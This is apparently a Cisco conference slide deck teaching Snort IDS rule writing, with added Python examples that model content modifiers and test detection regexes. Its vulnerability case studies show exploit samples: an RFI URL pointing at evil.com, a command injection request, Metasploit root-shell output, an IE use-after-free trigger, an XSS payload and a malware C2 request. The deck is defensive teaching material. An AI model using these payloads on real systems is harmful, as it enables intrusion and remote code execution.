2. Snort Rule Syntax
# rule header
alert tcp any any -> 192.168.1.0/24 111 (
# alert          -> rule action
# tcp            -> protocol
# any            -> src address
# any            -> src port
# 192.168.1.0/24 -> dst address
# 111            -> dst port
3. Snort Rule Syntax
# rule option format
alert tcp any any -> 192.168.1.0/24 111 (
msg:"Rule Message";
# msg            -> rule option
# "Rule Message" -> rule option argument
4. rule option: content
# content match example
alert tcp any any -> 192.168.1.0/24 111 (
content:"ABCD";
# is equivalent to:
content:"|41 42 43 44|";
The content match finds a static pattern in
network data.
5. content modifiers: nocase
# content match modifiers: nocase
alert tcp any any -> 192.168.1.0/24 111 (
# match "ABCD" or "abcd" etc.
content:"ABCD"; nocase;
nocase makes a content match case insensitive.
content matches are case sensitive by default.
6. content modifiers: offset
# content match modifiers: offset
alert tcp any any -> 192.168.1.0/24 111 (
# skip 2 bytes before searching for "ABCD"
content:"ABCD"; offset:2;
offset requires the match to occur after the
designated offset in network data.
7. content modifiers: depth
# content match modifiers: depth
alert tcp any any -> 192.168.1.0/24 111 (
# match "ABCD" within the first 4 bytes of the payload
content:"ABCD"; depth:4;
depth restricts how far Snort should search for
the specified pattern.
8. content modifiers: distance
# content match modifiers: distance
alert tcp any any -> 192.168.1.0/24 111 (
# find "DEF" 1 byte after "ABC"
content:"ABC"; content:"DEF"; distance:1;
distance specifies how far into a payload Snort
should ignore before starting to search for the
specified pattern relative to the end of the
previous pattern match.
9. content modifiers: within
# content match modifiers: within
alert tcp any any -> 192.168.1.0/24 111 (
# find "EFG" within 10 bytes of "ABC"
content:"ABC"; content:"EFG"; within:10;
within makes sure that at most N bytes are
between pattern matches.
10. negated content match
# negated content match
alert tcp any any -> 192.168.1.0/24 111 (
# make sure "EFG" is NOT within 10 bytes of "ABC"
content:"ABC"; content:!"EFG"; within:10;
content matches can be negated.
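The modifiers on slides 4 to 10 are easiest to understand by stepping through them on a few bytes. The Python below is an added example, not Snort's code and not from the deck: it models nocase, offset, depth, distance, within and negation on constructed payloads, plus the |41 42| hex notation from slide 4. It deliberately leaves out buffers such as http_uri and the fast pattern matcher, and it counts within from the distance-adjusted start (the slides never combine the two).

```python
# Added example (not Snort's code): a small model of the content modifiers
# described on slides 4 to 10, applied to constructed payloads, so the effect
# of nocase, offset, depth, distance, within and negation can be checked
# byte by byte. Buffers such as http_uri and fast_pattern are not modelled.

def parse_content(text):
    """Expand a Snort content string into bytes.

    Literal text is taken as-is; segments between pipes are hex bytes, so
    "ABCD" and "|41 42 43 44|" produce the same pattern (slide 4). Escaped
    pipes inside the literal are not handled by this simplified version.
    """
    out = bytearray()
    for i, seg in enumerate(text.split("|")):
        if i % 2 == 0:
            out += seg.encode("latin-1")       # literal part
        else:
            out += bytes.fromhex(seg)          # |41 42| hex part, spaces allowed
    return bytes(out)


def content_match(payload, pattern, nocase=False, offset=0, depth=None,
                  distance=None, within=None, negate=False, prev_end=None):
    """Apply one content option with its modifiers to a bytes payload.

    Returns (matched, anchor): anchor is the index just past the matched
    bytes, which the next relative content (distance/within) is measured from.
    A negated content is satisfied when the pattern is NOT in its window and
    leaves the anchor unchanged.
    """
    hay, needle = (payload.lower(), pattern.lower()) if nocase else (payload, pattern)

    if prev_end is not None and (distance is not None or within is not None):
        # relative modifiers: the window starts at the end of the previous match
        start = prev_end + (distance or 0)
        # simplification: within is counted from that start (the slides never
        # combine distance and within, so their exact interplay is not modelled)
        end = len(hay) if within is None else start + within
    else:
        # absolute modifiers: offset skips bytes, depth caps the bytes inspected
        start = offset
        end = len(hay) if depth is None else start + depth

    # bytes.find with start/end only reports a pattern that lies fully inside
    # the window, which is what depth and within require
    idx = hay.find(needle, start, min(end, len(hay)))
    found = idx != -1
    if negate:
        return (not found), prev_end
    return found, (idx + len(needle) if found else None)


def evaluate_rule(payload, contents):
    """Evaluate the content options of one rule in order.

    contents is a list of dicts holding content_match keyword arguments plus
    a "pattern" (a Snort content string, parsed with parse_content).
    """
    anchor = None
    for opt in contents:
        opt = dict(opt)
        pattern = parse_content(opt.pop("pattern"))
        matched, anchor = content_match(payload, pattern, prev_end=anchor, **opt)
        if not matched:
            return False
    return True


def demo():
    """One entry per slide modifier: (payload that fires, payload that does not)."""
    # all payloads are constructed for this example
    return {
        "nocase":   (evaluate_rule(b"xxabcdxx", [{"pattern": "ABCD", "nocase": True}]),
                     evaluate_rule(b"xxabcdxx", [{"pattern": "ABCD"}])),
        "offset":   (evaluate_rule(b"xxABCD", [{"pattern": "ABCD", "offset": 2}]),
                     evaluate_rule(b"ABCDxx", [{"pattern": "ABCD", "offset": 2}])),
        "depth":    (evaluate_rule(b"ABCDxx", [{"pattern": "ABCD", "depth": 4}]),
                     evaluate_rule(b"xABCD", [{"pattern": "ABCD", "depth": 4}])),
        "distance": (evaluate_rule(b"ABCxDEF", [{"pattern": "ABC"},
                                                {"pattern": "DEF", "distance": 1}]),
                     evaluate_rule(b"ABCDEF", [{"pattern": "ABC"},
                                               {"pattern": "DEF", "distance": 1}])),
        "within":   (evaluate_rule(b"ABC1234567EFG", [{"pattern": "ABC"},
                                                      {"pattern": "EFG", "within": 10}]),
                     evaluate_rule(b"ABC12345678EFG", [{"pattern": "ABC"},
                                                       {"pattern": "EFG", "within": 10}])),
        "negated":  (evaluate_rule(b"ABC1234567xyz", [{"pattern": "ABC"},
                                                      {"pattern": "EFG", "within": 10, "negate": True}]),
                     evaluate_rule(b"ABC1234567EFG", [{"pattern": "ABC"},
                                                      {"pattern": "EFG", "within": 10, "negate": True}])),
    }
```

The depth and within cases show the detail that trips people up: the whole pattern has to fit inside the window, so "ABCD" at byte 1 does not satisfy depth:4, and "EFG" whose last byte falls one past the within window is not a match.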
11. content buffers
# content buffer example
alert tcp any any -> 192.168.1.0/24 111 (
# match "ABC" within the HTTP URI
content:"ABC"; http_uri;
content matches can be restricted to a payload
location, such as the HTTP URI.
13. content modifiers: fast_pattern
# fast_pattern example
alert tcp any any -> 192.168.1.0/24 111 (
# set "ABC" as the rule fast_pattern
content:"ABC"; fast_pattern;
fast_pattern explicitly specifies the content
match within a rule to be used with the fast
pattern matcher. The fast_pattern serves as the
"entrance" condition for rule evaluation.
14. content modifiers: fast_pattern
# fast_pattern:only; example
alert tcp any any -> 192.168.1.0/24 111 (
# set "ABC" as the rule fast_pattern
content:"ABC"; fast_pattern:only;
fast_pattern:only; selects the content match to
be used in the fast pattern matcher for the
rule and also specifies that this match will
not be evaluated again when the rule "enters".
15. rule option: pcre
# pcre rule option example
alert tcp any any -> 192.168.1.0/24 111 (
# match the following regex
pcre:"/A[BC]D/i";
pcre declares a Perl compatible regular
expression for matching on payload data.
Flags can be specified after the slash.
e.g. /i for case insensitivity.
16. Traffic Triage and Isolation
[Diagram: traffic is narrowed in stages, from all traffic down to the vulnerability condition. Axes: Traffic Volume, Speed, Traffic Type.]
Normal Traffic -> fast_pattern (fast)
Vulnerable Application Traffic -> content, etc.
Vulnerable Parameter Traffic -> pcre (slow)
Vulnerability Condition
19. Buffer Overflow Overview
Stack buffer overflow in AVM Fritz!Box daemon
dsl_control.
AVM Fritz!Box firmware fails to check the length of user
supplied data in a 'se' or ScriptExecute command sent in a
SOAP request to the dsl_control daemon.
20. Buffer Overflow Overview
dsl_cpi_cli_access.c registers the command 'se' to the
DSL_CPE_CLI_ScriptExecute handler function:
[...]
DSL_CPE_CLI_CMD_ADD_COMM (
"se",
"ScriptExecute",
DSL_CPE_CLI_ScriptExecute,
g_sSe);
[...]
22. Buffer Overflow Overview
The code calls the function DSL_CPE_sscanf in order to
copy the value of the parameter pCommands to the local
character array sFileName without restriction or bounds
checking. The size of the vulnerable stack buffer is 256
bytes as indicated in dsl_cpi_cli_console.h:
#define DSL_MAX_COMMAND_LINE_LENGTH 256
Triggering the vulnerability is then a simple matter of
sending >256 bytes in the first 'se' parameter.
28. Command Injection Overview
CVE-2014-3805
Command injection vulnerabilities in AlienVault OSSIM av-centerd, which accepts SOAP commands on port 40007.
SOAP command 'get_log_line' parameter '$number_lines'
and 'get_license' parameter '$license_type' are used in OS
commands without sanitization.
29. Command Injection Overview
/usr/share/alienvault-center/lib/AV/CC/Util.pm
sub get_log_line() {
my ( $function_llamada, $name, $uuid, $admin_ip,
$hostname, $r_file, $number_lines ) = @_;
[...]
# $number_lines used in OS command without sanitization
my $command = "tail -$number_lines $r_file";
my @content = `$command`;
[...]
}
30. Command Injection Overview
/usr/share/alienvault-center/lib/AV/CC/Util.pm
sub get_license() {
my ( $function_llamada, $name, $uuid, $admin_ip,
$hostname, $license, $license_type ) = @_;
[...]
# $license_type used in OS command without sanitization
my $package = system ("curl --proxy-anyauth -K /etc/curlrc http://[...]/avl/$license_type/[...]");
}
36. Command Injection Overview
CVE-2014-5073
OS command injection vulnerability in VMTurbo
Operations Manager vmtadmin.cgi parameter 'fileDate'.
If the 'callType' parameter is set to "DOWN" vmtadmin.cgi
will pass the value of 'fileDate' to system().
37. Command Injection Overview
my $actiontype = $query->param("actionType");
my $calltype = $query->param("callType");
my $filedate = $query->param("fileDate");
my $statusfile = (defined $filedate) ? $filedate :
$mon.".".$mday." [...]
[...]
elsif ($calltype eq "DOWN") {
[...]
# $statusfile (from the fileDate parameter) used in OS command without sanitization
system("rm \"$upload_dir$statusfile\"");
[...]
38. Command Injection Exploit
GET /cgi-bin/vmtadmin.cgi?callType=DOWN&actionType=CFGBACKUP
&fileDate=%22%60printf%20%27177105114[...] HTTP/1.1
Host: 172.16.41.140
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
40. Command Injection Exploit
msf exploit(vmturbo_vmtadmin_exec_noauth) > exploit
[*] Started reverse handler on 172.16.158.1:4444
[*] Command shell session 1 opened (172.16.158.1:4444 ->
172.16.158.173:41320) at 2014-07-19 12:09:00 -0500
id
uid=0(root) gid=0(root) groups=0(root)
45. Directory Traversal Overview
CVE-2014-2424
Directory traversal vulnerability in Oracle Event
processing. FileUploadServlet function
processUploadedFile() fails to properly sanitize the
filename parameter value.
The WMI service can be abused to convert the file upload
into remote code execution without user interaction.
55. Use-After-Free Overview
CVE-2013-3893
This vulnerability is triggered by Javascript that sets an onlosecapture()
handler on the parent of two elements. This handler clears the DOM with
document.write() when it is called. The Javascript then calls setCapture() on
the parent and the child element. This triggers the onlosecapture() handler,
freeing a reference with document.write(). After the free, the invalid
reference will remain causing a crash (or code execution) in
MSHTML!CTreeNode::GetInterface.
56. Use-After-Free Trigger
function trigger()
{
var id_0 = document.createElement("sup");
var id_1 = document.createElement("audio");
document.body.appendChild(id_0);
document.body.appendChild(id_1);
id_1.applyElement(id_0);
id_0.onlosecapture=function(e) {
document.write("");
}
id_0.setCapture();
id_1.setCapture();
}
57. Use-After-Free Trigger
0:005> r
eax=41414141 ebx=6799799c ecx=679b6a14 edx=00000000 esi=00650d90 edi=021fcb34
eip=679b6b61 esp=021fcb0c ebp=021fcb20 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
MSHTML!CTreeNode::GetInterface+0xd8:
679b6b61 8b08 mov ecx,dword ptr [eax] ds:0023:41414141=????????
58. Use-After-Free Detection
alert tcp $EXTERNAL_NET $FILE_DATA_PORTS -> $HOME_NET any (
msg:"BROWSER-IE Microsoft Internet Explorer onlosecapture memory corruption attempt";
flow:to_client,established;
file_data;
content:".applyElement"; nocase;
content:".onlosecapture"; nocase; within:500; fast_pattern;
content:".setCapture"; nocase; within:500;
content:".setCapture"; nocase; within:500;
pcre:"/\.applyElement\s*\(\s*(?P<var>\w+)\s*\).*?(?P=var)\.onlosecapture.*?(?P=var)\.setCapture/si";
metadata:service ftp-data, service http, service imap, service pop3;
reference:cve,2013-3893;
)
59. Use-After-Free Detection
alert tcp $EXTERNAL_NET any -> $SMTP_SERVERS 25 (
msg:"BROWSER-IE Microsoft Internet Explorer onlosecapture memory corruption attempt";
flow:to_server,established;
file_data;
content:".applyElement"; nocase;
content:".onlosecapture"; nocase; within:500; fast_pattern;
content:".setCapture"; nocase; within:500;
content:".setCapture"; nocase; within:500;
pcre:"/\.applyElement\s*\(\s*(?P<var>\w+)\s*\).*?(?P=var)\.onlosecapture.*?(?P=var)\.setCapture/si";
metadata:service smtp;
reference:cve,2013-3893;
)
62. Remote File Include Overview
CVE-2008-5053
Remote file include vulnerability in Joomla Simple RSS Reader allows execution of
arbitrary PHP code via the parameter mosConfig_live_site in
administrator/components/com_rssreader/admin.rssreader.php:
include("$mosConfig_live_site/components/com_rssreader/about.html");
$mosConfig_live_site is obtained from the GET parameter of the same name sent to
admin.rssreader.php.
Exploit:
http://site/joomlapath/administrator/components/com_rssreader
/admin.rssreader.php?mosConfig_live_site=http://evil.com/
66. Browser Plugin Overview
CVE-2012-2516
GE Proficy Historian's KeyHelp.ocx ActiveX control adds HTML Help
functionality for the Proficy enterprise data collection system. It can be
instantiated in a web page using the <object> tag, for example:
<object id="ctrl" classid="clsid:45e66957-2932-432a-a156-31503df0a681">
Or using Javascript:
obj = new ActiveXObject("KeyHelp.KeyScript")
67. Browser Plugin Overview
The API of this ActiveX object exposes several methods including
LaunchTriPane(), which has the following prototype:
Void LaunchTriPane(System.string ChmFile)
The function LaunchTriPane will use ShellExecute to launch hh.exe, with user
controlled data as parameters:
> HH.EXE -decompile D:/destination-folder C:/test.chm
This can be abused to write arbitrary files. Code execution is possible by
uploading a WMI .mof file.
68. Browser Plugin Disassembly
KeyHelp.ocx:
5D335165 CALL KeyHelp.5D31797F
5D33516A JMP SHORT KeyHelp.5D33517D
5D33516C PUSH 5
5D33516E PUSH EDI
5D33516F PUSH ESI ; Malicious command line parameters - no validation
5D335170 PUSH KeyHelp.5D347950 ; ASCII "hh.exe"
5D335175 PUSH EDI
5D335176 PUSH EDI
5D335177 CALL SHELL32.ShellExecuteA ; run hh.exe with malicious params
5D33517D CMP ESI,EDI
5D33517F JE SHORT KeyHelp.5D335187
5D335181 PUSH ESI
74. Cross Site Scripting (XSS) Overview
OSVDB-89893
Cross-Site Scripting vulnerability in Nagios XI's Alert Cloud due to insufficient
sanitization of "width" and "height" parameters sent to the URI:
/includes/components/alertcloud/index.php
Exploit:
/nagiosxi/includes/components/alertcloud/index.php?height=4"}};
alert('XSS'); var aa={"A":{"B":"
75. Cross Site Scripting (XSS) Detection
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (
msg:"SERVER-WEBAPP Nagios XI alert cloud cross site scripting attempt";
flow:to_server,established;
content:"/includes/components/alertcloud/index.php"; fast_pattern:only; http_uri;
pcre:"/[?&](height|width)=[^&]*?([\x22\x27\x3c\x3e\x28\x29]|script|onload|src)/Ui";
metadata:service http;
reference:url,osvdb.org/show/osvdb/89893;
classtype:web-application-attack;
)
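The pcre options of the onlosecapture rule (slides 58 and 59) and the alert cloud rule (slide 75) do the precise work after the content matches have narrowed the traffic. The following Python is an added example, not from the deck or from Snort: it runs both expressions, with their backslashes restored, through Python's re module against samples condensed from slides 56 and 74 plus constructed benign inputs. Python's re is close enough to PCRE here (named groups, backreferences, \s, \w, \xNN, the s and i flags); Snort's /U flag, which selects the normalized URI buffer, is approximated by URL-decoding the request URI before matching.

```python
import re
from urllib.parse import unquote

# Added example, not part of the original deck: the pcre options of the two
# detection rules above, exercised with Python's re module on constructed data.

# Slides 58/59: the IE onlosecapture rule ties applyElement, onlosecapture and
# setCapture to the same JavaScript variable through a named backreference.
ONLOSECAPTURE_RE = re.compile(
    r"\.applyElement\s*\(\s*(?P<var>\w+)\s*\)"   # el.applyElement(var)
    r".*?(?P=var)\.onlosecapture"                # var.onlosecapture = ...
    r".*?(?P=var)\.setCapture",                  # var.setCapture()
    re.S | re.I,                                 # the rule's /s and /i flags
)

# Slide 75: the Nagios XI alert cloud rule. The content match (no nocase, so
# case sensitive) must hit first; /U is approximated by URL-decoding the URI.
ALERTCLOUD_PATH = "/includes/components/alertcloud/index.php"
ALERTCLOUD_RE = re.compile(
    r"[?&](height|width)=[^&]*?([\x22\x27\x3c\x3e\x28\x29]|script|onload|src)",
    re.I,
)


def onlosecapture_rule_matches(script_text):
    """True when the pcre of the slide 58/59 rule fires on a script body."""
    return ONLOSECAPTURE_RE.search(script_text) is not None


def alertcloud_rule_matches(request_uri):
    """True when both the content and the pcre of the slide 75 rule fire."""
    uri = unquote(request_uri)            # stand-in for Snort's http_uri normalization
    if ALERTCLOUD_PATH not in uri:        # content:"..."; fast_pattern:only; http_uri;
        return False
    return ALERTCLOUD_RE.search(uri) is not None


# Constructed samples. TRIGGER_JS condenses the slide 56 trigger; BENIGN_JS
# uses the same three APIs but not wired together on one variable, which is
# exactly what the backreference is there to tell apart.
TRIGGER_JS = """
id_1.applyElement(id_0);
id_0.onlosecapture = function(e) { document.write(""); }
id_0.setCapture();
id_1.setCapture();
"""
BENIGN_JS = "wrapper.applyElement(child); child.onlosecapture = cleanup; wrapper.setCapture();"

# EXPLOIT_URI is the slide 74 request; ENCODED_URI is the same quote and braces
# percent-encoded, which only the normalized buffer catches; BENIGN_URI is a
# normal widget request.
EXPLOIT_URI = '/nagiosxi/includes/components/alertcloud/index.php?height=4"}};alert(\'XSS\'); var aa={"A":{"B":"'
ENCODED_URI = "/nagiosxi/includes/components/alertcloud/index.php?height=4%22%7D%7D%3B"
BENIGN_URI = "/nagiosxi/includes/components/alertcloud/index.php?height=400&width=600"


def demo():
    """Return the verdicts for the sample inputs as (name, fired) pairs."""
    return {
        "trigger_js": onlosecapture_rule_matches(TRIGGER_JS),
        "benign_js": onlosecapture_rule_matches(BENIGN_JS),
        "exploit_uri": alertcloud_rule_matches(EXPLOIT_URI),
        "encoded_uri": alertcloud_rule_matches(ENCODED_URI),
        "benign_uri": alertcloud_rule_matches(BENIGN_URI),
        "other_path": alertcloud_rule_matches("/other.php?height=4%22"),
    }
```

Two things worth noticing when running it: the benign script is not flagged even though all three method names appear, because the backreference requires the element passed to applyElement to be the one that receives onlosecapture and setCapture; and the percent-encoded request is caught only because the URI is decoded first, which is what the http_uri buffer and the /U flag provide in Snort.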
78. Malware Sample Overview
Win.Trojan.Sefnit
Upon execution Win.Trojan.Sefnit drops a service to %AppData%\Updater\updater.dll and starts it.
When the service updater.dll starts it attempts to read tasks from the configuration file
%AppData%\Updater/~conf.dat
Initially the conf.dat file doesn't exist. The sample obtains the Disk Volume Serial number and
appends it to the MachineGUID. This string is then encrypted. The sample uses 16 bytes of the
encrypted value and converts it to a 32 character hex string and uses this string as a UUID sent in
the initial request to C2:
GET /j/20a0b8237d5b084e46bd673e26d948bf/0001 HTTP/1.1
Host: axnlze.net
Accept: */*
The URI above has the following hardcoded format:
hxxp://<c2domain>/j/<uuid>/<version>
82. Call to Action
• Related sessions:
  • Introduction to Snort Rule Writing
  • Detection Strategies with Snort [DevNet-1126]
• Visit the World of Solutions for
  • Cisco Campus
  • Walk in Labs
  • Technical Solution Clinics
• Meet the Engineer - Available immediately after this talk.